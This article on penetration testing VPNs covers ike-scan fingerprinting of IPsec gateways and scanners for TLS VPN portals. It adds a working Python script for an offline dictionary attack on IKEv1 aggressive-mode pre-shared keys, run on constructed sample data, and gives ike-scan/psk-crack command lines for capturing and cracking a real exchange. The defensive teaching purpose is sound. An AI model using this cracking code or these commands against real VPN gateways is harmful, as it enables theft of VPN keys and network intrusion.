Learning How to Pen Test VPNs
Many businesses use virtual private networks (VPNs) to let employees reach internal systems securely instead of sending sensitive company data over unencrypted internet connections. With a VPN, workers can connect to their employer's network from anywhere in the world. However, a VPN can also lure people into a false sense of security and cause them to let their guard down.
To maintain the security and privacy that a VPN is designed to offer, it is essential that both the businesses and the employees who use them understand how to keep them secure.
Pen Testing
Penetration testing is a common practice in cybersecurity. In order to pen test a system, the tester assumes the role of an attacker and then tries to infiltrate or interfere with the network in a way that an attacker would. By attacking your own systems and networks, you can identify any security holes and work to patch them up as swiftly and efficiently as possible.
From the perspective of an attacker, a VPN is often like a big, flashing neon sign that says, “Sensitive data here!” Experienced attackers will look for signs like this that indicate a worthy target. If they think they have found a connection through which sensitive, and potentially valuable, data is flowing, they have a greater motivation to try and attack it.
You shouldn’t just add a VPN to your network and then assume that everything is secure. You should subject your VPN to the same pen testing that you use to keep your main business network safe from intruders.
The steps you take to properly pen test your VPN depend on the type of VPN you are dealing with. Your VPN will be built on one of two protocol families: IPsec (with IKE handling key exchange and authentication) or TLS (or its predecessor, SSL). Let's take a look at how we pen test each of them.
IPsec VPN
If you have an IPsec VPN, you will want a tool called ike-scan. It is developed by NTA Monitor and provides vital information for assessing the security of your gateway. For one thing, it can fingerprint the IKE implementations of many common VPN vendors and VPN-enabled routers, using the Vendor ID payloads a gateway returns and the timing pattern of its retransmission backoff. Armed with that information, a potential attacker can search the internet for known weaknesses in the specific product or firmware version they have identified.
Not every gateway is susceptible to this fingerprinting, and there will not always be a public exploit for an attacker to use. However, the scan also reveals basic configuration details, such as which transforms the gateway accepts, whether it answers aggressive mode, and which authentication method (pre-shared key or certificates) it uses, and that is of tremendous use to an attacker. The classic follow-on attack is aggressive mode with pre-shared keys: the responder sends its authentication hash in the clear, so the hash can be captured and attacked offline with a wordlist. psk-crack, shipped with ike-scan, automates exactly that.
Identifying which weaknesses apply to your VPN lets you address them and close the holes in your security. In addition, check your VPN gateway and every associated network device to make sure none of them still uses default credentials. Default login details for services and routers are easy for anyone to find.
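The aggressive-mode weakness described above, as an added example that is not part of the original article or of ike-scan itself. In the IKEv1 pre-shared-key case (RFC 2409 sections 5 and 5.4), the responder's hash is HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b) with SKEYID = prf(PSK, Ni_b | Nr_b); in aggressive mode every input except the PSK crosses the wire unencrypted, so candidate PSKs can be tested offline. The script computes those values and runs a dictionary attack against a constructed exchange (the DH values, cookies and nonces are arbitrary stand-in bytes; only HASH_R is computed for real, from a PSK chosen for the example). The colon-separated capture format is the one I understand psk-crack to read (`g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r`); treat that layout, and the `ike-scan -A -Pcapture.txt --id=<id> <gateway>` / `psk-crack -d wordlist.txt capture.txt` command lines that would produce a real capture, as assumptions to check against your installed version.

```python
"""Offline dictionary attack on an IKEv1 aggressive-mode pre-shared key.

Added example: in aggressive mode every input to the responder's HASH_R
except the PSK is sent in the clear, so a passive observer can test
candidate PSKs offline.  Formulas follow RFC 2409 sections 5 and 5.4.
"""
import hashlib
import hmac
import struct

# SAi_b: body of the initiator's SA payload (DOI, situation, one proposal
# carrying one transform: 3DES / SHA1 / PSK / DH group 2 / 28800 s).
# Constructed here to resemble the probe a scanner would send.
_ATTRS = b"".join(struct.pack("!HH", 0x8000 | t, v) for t, v in
                  ((1, 5), (2, 2), (3, 1), (4, 2), (11, 1), (12, 28800)))
_TRANSFORM = struct.pack("!BBHBBH", 0, 0, 8 + len(_ATTRS), 1, 1, 0) + _ATTRS
_PROPOSAL = struct.pack("!BBHBBBB", 0, 0, 8 + len(_TRANSFORM), 1, 1, 0, 1) + _TRANSFORM
SAI_B = struct.pack("!II", 1, 1) + _PROPOSAL

# Field order of a psk-crack capture line (assumed layout, see lead-in).
FIELDS = ("gxr", "gxi", "cky_r", "cky_i", "sai_b", "idir_b", "ni", "nr")


def skeyid(psk, ni, nr, hash_name="sha1"):
    """SKEYID = prf(PSK, Ni_b | Nr_b) for pre-shared-key authentication."""
    return hmac.new(psk, ni + nr, hash_name).digest()


def hash_r(psk, gxr, gxi, cky_r, cky_i, sai_b, idir_b, ni, nr, hash_name="sha1"):
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    key = skeyid(psk, ni, nr, hash_name)
    return hmac.new(key, gxr + gxi + cky_r + cky_i + sai_b + idir_b, hash_name).digest()


def crack_psk(observed_hash_r, exchange, wordlist, hash_name="sha1"):
    """Return the first candidate PSK whose HASH_R matches the observed one, else None."""
    for candidate in wordlist:
        guess = hash_r(candidate.encode(), hash_name=hash_name, **exchange)
        if hmac.compare_digest(guess, observed_hash_r):
            return candidate
    return None


def parse_capture(line):
    """Parse one colon-separated hex line in psk-crack order (assumed layout)."""
    parts = [bytes.fromhex(p) for p in line.strip().split(":")]
    if len(parts) != 9:
        raise ValueError("expected 9 colon-separated hex fields")
    return parts[8], dict(zip(FIELDS, parts[:8]))


def format_capture(observed_hash_r, exchange):
    """Inverse of parse_capture; produces the same colon-separated hex line."""
    return ":".join(exchange[f].hex() for f in FIELDS) + ":" + observed_hash_r.hex()


def constructed_capture(psk):
    """Build a deterministic stand-in for an observed aggressive-mode exchange.

    The DH public values, cookies and nonces are arbitrary bytes (they are
    opaque to the prf); only HASH_R is computed for real, using the given PSK.
    This is constructed sample data, not a real capture.
    """
    exchange = {
        "gxr": hashlib.sha256(b"responder KE").digest() * 4,   # 128 bytes, like group 2
        "gxi": hashlib.sha256(b"initiator KE").digest() * 4,
        "cky_r": bytes.fromhex("a1b2c3d4e5f60718"),
        "cky_i": bytes.fromhex("0102030405060708"),
        "sai_b": SAI_B,
        "idir_b": bytes([1, 17, 0x01, 0xF4, 192, 0, 2, 1]),   # ID_IPV4_ADDR, UDP/500, 192.0.2.1
        "ni": hashlib.sha1(b"Ni").digest(),
        "nr": hashlib.sha1(b"Nr").digest(),
    }
    return hash_r(psk, **exchange), exchange


if __name__ == "__main__":
    observed, exch = constructed_capture(b"Summer2024!")
    hr, ex = parse_capture(format_capture(observed, exch))
    print("recovered PSK:", crack_psk(hr, ex, ["password", "vpn123", "Summer2024!"]))
```

The fix on the gateway side is the one the attack implies: disable aggressive mode, or at least stop pairing it with pre-shared keys, and prefer certificate authentication with main mode (or IKEv2). If a PSK must stay, it needs to be long and random enough that a wordlist of the kind used here will never contain it.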
TLS VPN
On the other hand, if you have a TLS VPN, ike-scan will tell you nothing, because a TLS gateway does not speak IKE. Start instead by fingerprinting the TLS endpoint itself: service detection with nmap, and a TLS configuration scanner such as sslscan or testssl.sh to check supported protocol versions, cipher suites and certificate problems. Because a TLS VPN usually exposes a web portal, you should also run web application scanners such as AppScan (originally from Watchfire) and WebInspect, which look for the attack vectors that apply to it: cross-site scripting (XSS), SQL injection, and buffer overflows in the gateway's request handling. These are often dismissed as old news, which is exactly why they get overlooked.
Many of these tools not only scan your network for potential weaknesses but can also follow up with manual or automated exploitation. That gives you concrete evidence of whether you are actually vulnerable rather than a list of possibilities.
A VPN is designed to offer users enhanced privacy and security. However, if you simply install a VPN and assume that you are therefore fully secure, you are asking for trouble. You should subject your VPN to the same pen testing that you would any other network component.